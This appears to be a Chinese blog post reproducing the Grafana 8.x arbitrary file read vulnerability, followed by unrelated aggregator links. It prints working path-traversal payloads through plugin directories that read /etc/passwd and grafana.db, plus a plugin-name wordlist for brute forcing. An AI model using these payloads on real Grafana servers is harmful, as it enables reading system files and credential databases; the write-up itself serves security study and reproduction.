MrHatSec
MrHatSec

Grafana 任意文件读取漏洞复现

一、漏洞描述

Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件

二、漏洞影响

Grafana 8.x

三、漏洞复现

可以从登陆页面看到版本信息为 v8.2.4,此版本在漏洞射程范围之内

查看当前所使用的插件:

/api/plugins?embedded=0
http://10.10.12.120:443/api/plugins?embedded=0

Grafana 任意文件读取漏洞复现_第1张图片

读取 /etc/passwd文件

POC: /public/plugins/welcome/../../../../../../../../../etc/passwd

Grafana 任意文件读取漏洞复现_第2张图片

读取 db 文件

POC: /public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db

 Grafana 任意文件读取漏洞复现_第3张图片

四、探测插件

因为环境的不同可能存在的插件也就不同

4.1 字典爆破

可以直接去官网爬取字典:https://grafana.com/grafana/plugins/

一些比较热门的插件字典

alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text

4.2 页面抓取

查看网站登陆页面源代码,匹配关键字 public/app/plugins/panel/

Grafana 任意文件读取漏洞复现_第4张图片

猜测关键字后面的为插件名称,我们找个除了 welcome 这个插件的另外一个插件来测试

 

然后拼接 payload 为

/public/plugins/alertlist/../../../../../../../../../etc/passwd

Grafana 任意文件读取漏洞复现_第5张图片 

你可能感兴趣的:(漏洞复现,安全,web安全)

  • HarmonyOS Next 用户认证应用 架构教育
    随着HarmonyOSNext的不断发展,其用户认证功能在安全性、个性化和分布式场景中的应用展现了强大的扩展性和适应性。本文将从进阶功能、分布式场景应用以及定制与优化案例三个方面,深入探讨HarmonyOSNext用户认证的创新与优势。一、HarmonyOSNext用户认证的进阶功能生物特征认证的高级特性HarmonyOSNext在生物特征认证方面引入了多项先进技术。指纹认证通过活体检测技术,能够
  • IT圈大实话!卷运维不如卷网络安全,这可能是你转行的最后的机会 程序员晓晓 运维web安全干货分享计算机网络安全渗透测试职场发展
    前言2025年马上进入金三银四的行情,最近我也去问了一下行业内的小伙伴,我发现最近很多从事运维的选择了辞职,转行到了网络安全这个发展路线。说实话,运维工程师这个岗位在IT行业里面确实是处于最底层的,不管什么环节出现问题,基本都是运维背锅。,薪资水平也比不上别的岗位。一般运维的薪资水平大多数都是6-9K,还要高频出差年轻的时候干几年确实还可以,但是成家立业之后就不合适到处出差了。运维的事情非常多,不
  • Objective-C语言的网络编程 俞嫦曦 包罗万象golang开发语言后端
    Objective-C语言中的网络编程引言Objective-C是一种面向对象的编程语言,广泛应用于iOS和macOS应用程序的开发。随着移动互联网的快速发展,网络编程成为了现代应用程序开发中不可或缺的一部分。无论是从服务器获取数据、上传文件,还是实现实时通信,网络编程都扮演着至关重要的角色。本文将深入探讨Objective-C语言中的网络编程,涵盖从基础的网络请求到高级的异步处理、安全通信等内容
  • GPT-4o mini小型模型具备卓越的文本智能和多模态推理能力 FlowUs息流使用宝典 GPT-4omini
    GPT-4omini是首个应用OpenAI指令层次结构方法的模型,这有助于增强模型抵抗越狱、提示注入和系统提示提取的能力。这使得模型的响应更加可靠,并有助于在大规模应用中更安全地使用。GPT-4omini在学术基准测试中,无论是在文本智能还是多模态推理方面,都超越了GPT-3.5Turbo和其他小型模型,并支持与GPT-4o相同的语言范围。它在函数调用方面也表现出色,这使开发者能够构建应用程序来从
  • dify重磅升级:从0.15.3安全升级1.1.0新手避坑指南 Ven% 简单说深度学习docker实用DIfy动手difydockerpython人工智能
    DockerCompose部署备份自定义的docker-composeYAML文件(可选)cddockercpdocker-compose.yamldocker-compose.yaml.-$(date+%Y-%m-%d-%H-%M).bak从main分支获取最新代码gitcheckoutmaingitpulloriginmain停止服务,命令,请在docker目录下执行
  • Uni-app 笔记二 (项目笔记) 天籁晴空 #vue3#TS#小程序--uni-appuni-app笔记
    /***@authorwn*@date2023/07/2610:14:15*@description:uniapp笔记*//*1安全区域屏幕去掉状态栏+刘海剩余展示内容的区域--可通过uni.getSystemInfoSync()获取屏幕上边界到安全区顶部的距离。safeAreaInsets={top:59,left:0,right:0,bottom:34}"navigationStyle":"c
  • 【数据库】MySQL备份与恢复策略:确保数据安全必备技能 千益 数据库数据库mysql
    在数据库管理中,数据是企业最宝贵的资产之一。无论是硬件故障、人为错误还是恶意攻击,数据丢失都可能对业务造成灾难性影响。因此,制定并实施有效的备份与恢复策略是确保数据安全的关键。本文将深入探讨MySQL备份与恢复的最佳实践,并通过丰富的实际案例帮助您理解如何在实际场景中应用这些策略。一、为什么需要备份与恢复策略?1.数据丢失的常见原因硬件故障:磁盘损坏、服务器宕机等。人为错误:误删数据、错误操作等。
  • 汽车机械钥匙升级一键启动的优点 zsmydz888 汽车无钥匙启动汽车
    汽车机械钥匙升级一键启动的优点主要包括:便捷性:一键启动功能的引入极大地提升了用车便捷性。车主无需翻找钥匙,只需在车辆感应范围内轻触启动键,即可轻松发动汽车。安全性:移动管家专车专用一键启动系统配备了防盗警报功能。在车辆遭遇盗窃或意外情况时,系统会迅速锁定发动机,有效预防车辆被盗。科技感:一键启动作为现代汽车的先进配置,使驾驶过程更加智能化和便捷化。无需拿出钥匙:只要钥匙在你身边,达到感应距离,就
  • MySQL 安全传输 向阳1218 大数据doris
    Doris开启SSL功能需要配置CA密钥证书和Server端密钥证书,如需开启双向认证,还需生成Client端密钥证书:默认的CA密钥证书文件位于Doris/fe/mysql_ssl_default_certificate/ca_certificate.p12,默认密码为doris,您可以通过修改FE配置文件conf/fe.conf,添加mysql_ssl_default_ca_certifica
  • 2025年三个月自学手册 网络安全(黑客技术) 网安kk web安全安全网络网络安全人工智能
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习导航
  • SpringBoot获取不到用户真实IP怎么办
    在SpringBoot应用中获取用户的真实IP地址,对于实现安全控制、日志记录以及个性化服务至关重要。以下是详细的方法及步骤:️方法概述通过HttpServletRequest对象,可以从用户请求中提取IP地址。由于请求可能经过多个代理服务器,因此需要依次检查多个请求头,以确保获取到用户的真实IP。代码示例以下是一个完整的Controller方法示例,用于获取用户的真实IP地址:importjav
  • 七个合法学习黑客技术的平台,让你从萌新成为大佬 黑客白帽子黑爷 学习php开发语言web安全网络
    1、HackThisSite提供在线IRC聊天和论坛,让用户交流更加方便。网站涵盖多种主题,包括密码破解、网络侦察、漏洞利用、社会工程学等。非常适用于个人提高网络安全技能2、HackaDay涵盖多个领域,包括黑客技术、科技、工程和DIY等内容,站内提供大量有趣的文章、视频、教程和新闻,帮助用户掌握黑客技术和DIY精神。3、OffensiveSecurity一个专门提供网络安全培训和认证的公司,课程
  • 新手如何成为一名顶尖黑客?只需这十二个步骤轻松入门! 网络安全淼叔 黑客渗透测试白帽黑客网络安全副业
    成为一名黑客的过程涉及不断学习和实践技术,既要掌握基础的计算机知识,也要具备足够的安全意识和道德责任感。以下是成为一名黑客的12个基本步骤,为小白提供系统的入门指导。对于从来没有接触过黑客的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。1.了解计算机基础要成为一名黑客,首先需要了解计算机硬件、操作系统和网络的基础。你需要理解计算机如何处
  • C++智能指针:从内存裸奔到安全驾驶(附保姆级代码示例) 灰灰的C旅程 随时随地C++C/C++c++安全开发语言
    大家好呀,我是灰灰,上期咱们聊完引用,不少小伙伴在评论区哭诉内存泄漏的惨痛经历。今天咱们就来解锁C++的"自动驾驶"神器——智能指针!从此告别new/delete的手动挡时代,系好安全带,发车啦!一、智能指针是什么?为什么需要它?1.1手动管理内存的痛void作死示例(){int*裸指针=newint[10086];//申请//...一顿操作猛如虎...if(rand()%2)return;//5
  • 【ChatGPT】如何选择不同版本的Java 南天归鴻 java
    下面提供一份综合多方专业平台(如Oracle、InfoWorld、DZone、AdoptOpenJDK、RedHat等)信息整理的Java版本推荐报告,数据截止至2025年3月18日。下文将对“最新版本”、“稳定的最新版本”、“最稳定的版本”以及“市面上最常用的版本”进行详细对比,并从版本特性、优势、劣势、学习/实验需求、企业生产需求、兼容性与安全性等角度进行分析,供各类用户参考。一、背景说明Ja
  • CTF学习法则——寒假篇 新手赶快收藏吧! 网络安全技术分享 学习网络安全web安全php
    CTF(CapturetheFlag)是网络安全领域中的一种比赛形式,涵盖了漏洞利用、逆向工程、加密解密、编码解码等多方面的技术,参与者通过解决难题(称为“Flag”)获得积分。对于想要在寒假期间提升CTF技能的同学们,以下是一些有效的学习法则,可以帮助你高效地进行学习和提升:1.合理规划学习时间寒假时间有限,建议制定合理的学习计划:每天固定时间学习:保持稳定的学习节奏,避免临时抱佛脚。分阶段学习
  • 网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇就够了 白帽黑客坤哥 web安全安全网络网络安全物联网
    href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/kdoc_html_views-1a98987dfd.css"rel="stylesheet"/>href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_v
  • Spring Boot 配置属性 (Configuration Properties) 详解:优雅地管理应用配置 无眠_ springboot前端后端
    引言SpringBoot的配置属性(ConfigurationProperties)是其另一个核心特性,它提供了一种类型安全、结构化的方式来管理应用的配置信息。与自动配置相辅相成,配置属性允许开发者以声明式的方式将外部配置(如properties文件、YAML文件、环境变量等)绑定到Java对象,从而简化配置读取和使用,提高代码的可读性和可维护性。本文将深入解析SpringBoot配置属性的原理、
  • LJF-Framework 第1章【一个不成熟的想法】 one one day LJF-Frameworkspringjavaspringboot
    LJF-Framework第1章【一个不成熟的想法】一、想法的诞生平时自己写点小demo,练练手,学点新知识,或者整点小项目。弱鸡的我在写一些新的项目的时候,对于一些常用的功能,写代码那肯定就是CV大法了,从以前写过的代码中各种CV,结果好多项目用的框架不同,总得修修改改,太费经,比如说安全鉴权等,一开始练习shiro、后来又学习SpringSecurity,然后又研究了一波sa-token,对于
  • 优麒麟Ubuntu Kylin 20.04 Pro SP1 上线 Linux_华仔 技术干货ubuntukylin网络
    优麒麟团队正式宣布UbuntuKylin20.04ProSP1上线。此版本默认搭载Linux5.11内核,新增显示器显示模式的记忆支持、鼠标拖拽支持等功能,优化网络插件、登录程序和定时关机等系统组件,修复了用户手册程序崩溃、软件商店暂停键刷新不及时、蓝牙传输空文件失败等严重问题,累计200+桌面环境和应用软件方面的已知问题得到解决,从而全面提升系统稳定性和安全性,为用户提供更加高效便捷的使用体验,
  • Shiro授权 斗-匕 oracle数据库
    在Java安全领域,ApacheShiro以其强大的功能和灵活性备受开发者青睐。其中,授权机制是Shiro的核心功能之一,它确保了用户只能访问其被授权的资源。本文将深入探讨Shiro授权,涵盖静态和动态授权、权限、角色、隐式角色、显式角色、授权流程以及授权方式等方面。一、Shiro简介ApacheShiro是一个功能强大的Java安全框架,它提供了认证、授权、加密和会话管理等功能。Shiro的设计
  • 华为海思 CPU「麒麟 X90」曝光 自不量力的A同学 华为
    2025年3月15日,中国信息安全评测中心发布安全可靠测评结果公告(2025年第1号),华为海思麒麟X90处理器首次曝光,其安全可靠等级评测结果为II级。相关信息如下:架构与制程:采用华为自研的“泰山V3”架构,基于ARMv9指令集,首次在PC端实现“超线程+大小核异构”设计,集成多达16核(4大核+12能效核),主频突破4.2GHz。推测制程为中芯国际N+2的等效7nm技术。芯片集成:将CPU、
  • Kali Linux 渗透测试环境配置(Metasploit + Burp Suite) 李游Leo 环境配置linux运维服务器
    一、KaliLinux系统准备首先,确保你已经成功安装了KaliLinux系统。可以从官方网站下载镜像文件,并通过U盘引导安装等常规方式完成系统部署。建议使用最新稳定版本,以获取最新的软件包支持和安全更新。安装完成后,登录系统,打开终端。由于许多操作需要管理员权限,在终端输入“sudosu”切换到root用户,后续操作若无特殊说明,均在root权限下进行。二、Metasploit配置1.KaliL
  • TDE透明加密:重塑文件传输与网盘存储的安全新范式 安 当 加 密 安全
    在数据要素价值持续释放的今天,企业文件传输与存储系统正面临**“既要跨域流动,又要严防泄露”的双重挑战。传统加密方案往往陷入两难困境:离线传输依赖手工解密导致效率低下,网盘存储依赖平台方加密存在密钥失控风险。作为国内数据安全领域的创新者,上海安当推出的TDE透明加密技术**,以**“端到端无感加密、全链路权限管控、跨平台无缝兼容”**为核心,为企业构建从文件生成、传输到存储的全生命周期防护体系。本
  • Cargo deny安装指路 编辑器
    本博客所有文章除特别声明外,均采用CCBY-NC-SA4.0许可协议。转载请注明来自唯你简介cargodeny是一个Rust工具,用于检查项目依赖项的许可证、安全性和其他合规性问题。在RustCI(持续集成)中,cargodeny扮演着重要角色:许可证检查:确保项目使用的所有依赖项的许可证都符合项目的许可政策。安全漏洞扫描:检查依赖项是否存在已知的安全漏洞。依赖项合规性:验证依赖项是否符合项目的其
  • 扫盲系列--Web3智能合约+Solidity简介 「已注销」 前端框架
    前言这几天web3智能合约这个概念,频繁映入我的眼帘。web3.0这个概念我听说过,核心特征是去中心化、开放性、隐私保护和数据所有权回归个人。Web1.0是信息浏览时代,Web2.0是用户参与和社交网络时代,Web3.0是去中心化与智能化时代。在Web3.0这一新的互联网架构下,用户不再仅仅是内容的消费者,更是自己数字身份和数据的拥有者。Web3.0旨在构建一个更加透明、安全且高效的信息网络。我对
  • 零信任时代的守护者:Nginx如何成为API流量监控的中流砥柱 墨夶 Nginx学习资料1nginx运维
    随着企业数字化转型的步伐加快,应用程序接口(API)作为连接不同系统和服务的关键桥梁,其重要性日益凸显。然而,在开放互联的同时,API也成为攻击者觊觎的目标。为了应对这一挑战,零信任安全模型应运而生,强调“永不信任,始终验证”的核心原则。本文将深入探讨Nginx在零信任架构下的强大API流量监控能力,展示它是如何帮助企业构建起坚不可摧的安全防线。1.零信任与API安全的交集1.1零信任的核心理念零
  • 持续升级的电子实验记录本系统,更加好用、安全 PhDTool 安全人工智能数据库bug
    在当下的科研与工业研发浪潮中,电子实验记录本系统(ELN)正以每年超过19%的惊人增速,迅速在医药、化工等研发领域扎根。它宛如一股新兴的科技力量,重塑着实验室的工作模式。不过,在这股热潮背后,有部分人秉持着“买了系统之后就万事大吉,不用更新”的观念。针对这一现象,某机构对100家实验室展开了专项调查,其结果揭示了诸多值得深思的事实。调查数据显示,高达78%的用户认可ELN极大地提升了工作效率。这一
  • Hyperlane:轻量、高效、安全的 Rust Web 框架新选择 LTPP 安全rust前端githubssl开发语言后端
    Hyperlane:轻量、高效、安全的RustWeb框架新选择在Web开发的世界中,框架的选择往往决定了项目的效率与未来。Hyperlane,一款基于Rust语言打造的轻量级Web框架,正以其卓越的性能、简洁的设计和可靠的安全性,迅速成为开发者的新宠。无论你是追求极致性能的资深程序员,还是希望快速上手的初学者,Hyperlane都能为你带来惊喜。让我们一起走进Hyperlane的世界,探索它的魅力
  • Hyperlane:Rust 语言打造的 Web 后端框架新标杆 LTPP rust前端githubssl网络协议网络开发语言
    Hyperlane:Rust语言打造的Web后端框架新标杆在当今快节奏的数字化时代,Web应用程序的性能和开发效率成为了开发者们关注的焦点。Rust语言凭借其出色的性能、内存安全性和并发性,在Web开发领域逐渐崭露头角。而Hyperlane,作为一款专为Rust语言打造的轻量级、高性能HTTP服务器库,正以其独特的优势吸引着越来越多开发者的目光。一、性能卓越,数据说话Hyperlane在性能方面的
  • java观察者模式 3213213333332132 java设计模式游戏观察者模式
    观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。 在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。 这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。 老鹰会变成观察者,母鸡和小鸡是
  • TFS RESTful API 模拟上传测试 ronin47
           TFS RESTful API 模拟上传测试。    细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片: curl --data-binary @/opt/tfs.png http
  • PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式PHP
    // 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
  • hibernate 171815164 Hibernate
    main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
  • Ant实例分析 g21121 ant
            下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。           下面是build.xml的代码: <?xml version="1
  • [简单]工作记录_接口返回405原因 53873039oycg 工作
             最近调接口时候一直报错,错误信息是:       responseCode:405 responseMsg:Method Not Allowed        接口请求方式Post.
  • 关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别 程序员是怎么炼成的
       真正完成类的加载工作是通过调用 defineClass来实现的;  而启动类的加载过程是通过调用 loadClass来实现的;  就是类加载器分为加载和定义   protected Class<?> findClass(String name) throws ClassNotFoundExcept
  • JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
    所有的JDBC应用程序都具有下面的基本流程:  1、加载数据库驱动并建立到数据库的连接。  2、执行SQL语句。  3、处理结果。  4、从数据库断开连接释放资源。 下面我们就来仔细看一看每一个步骤: 其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接:   Html代码  St
  • rome创建rss antonyup_2006 tomcatcmsxmlstrutsOpera
    引用 1.RSS标准 RSS标准比较混乱,主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W
  • html表格和表单基础 百合不是茶 html表格表单meta锚点
    第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,   html是一种标记语言,其实很简单都是固定的格式   _----------------------------------------表格和表单 表格是html的重要组成部分,表格用在body里面的 主要用法如下; <table> &
  • ibatis如何传入完整的sql语句 bijian1013 javasqlibatis
            ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。         解决办法: <
  • 精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle数据库plsql
    /* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
  • 【Linux命令】Linux工作中常用命令 bit1129 linux命令
    不断的总结工作中常用的Linux命令   1.查看端口被哪个进程占用   通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息   netstat -anp | grep 8085   察看进程ID对应的进程占用的端口号   netstat -anp | grep 进程ID &
  • 优秀网站和文档收集 白糖_ 网站
    集成 Flex, Spring, Hibernate 构建应用程序   性能测试工具-JMeter   Hmtl5-IOCN网站   Oracle精简版教程网站   鸟哥的linux私房菜   Jetty中文文档   50个jquery必备代码片段   swfobject.js检测flash版本号工具
  • angular.extend boyitech AngularJSangular.extendAngularJS API
    angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
  • java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
    网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插
  • ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUploadie6ie7ie8ie9
    jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
  • [机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
           机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....        另外,如果一
  • Oracle Multitable INSERT 的用法 daizj oracle
    转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法:     Insert Into 表名 (字段1,字段2,字段3...)     Values (值1,
  • 专访黑客历史学家George Dyson datamachine on
    20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
  • 小学6年级英语单词背诵第一课 dcj3sjt126com englishword
    always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住   usual 通常的 early 早的 begin 开始 month 月份   year 年 last 最后的 east 东方的 high 高的   far 远的 window 窗户 world 世界 than 比...更  
  • 在线IT教育和在线IT高端教育 dcj3sjt126com 教育
    codecademy  http://www.codecademy.com codeschool  https://www.codeschool.com teamtreehouse  http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
  • Struts2 xml校验框架所定义的校验文件 蕃薯耀 Struts2 xml校验Struts2 xml校验框架Struts2校验
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
  • mac下安装rar和unrar命令 hanqunfeng mac
    1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
  • 三种将list转换为map的方法 jackyrong list
      在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下    class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
  • 年轻程序员需要学习的5大经验 lampcy 工作PHP程序员
    在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加
  • 评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
    先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,
  • 使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jspinput回车键绑定clickenter
    假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:   function search() { //监听函数略...... }   为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():   //回车绑定 $(".search").keydown(fun
  • EXT学习记录 tntxia ext
      1. 准备   (1) 官网:http://www.sencha.com/   里面有源代码和API文档下载。   EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。   (2)帮助文档:   想要查看EXT的官方文档的话,可以去这里h
  • mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
    最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他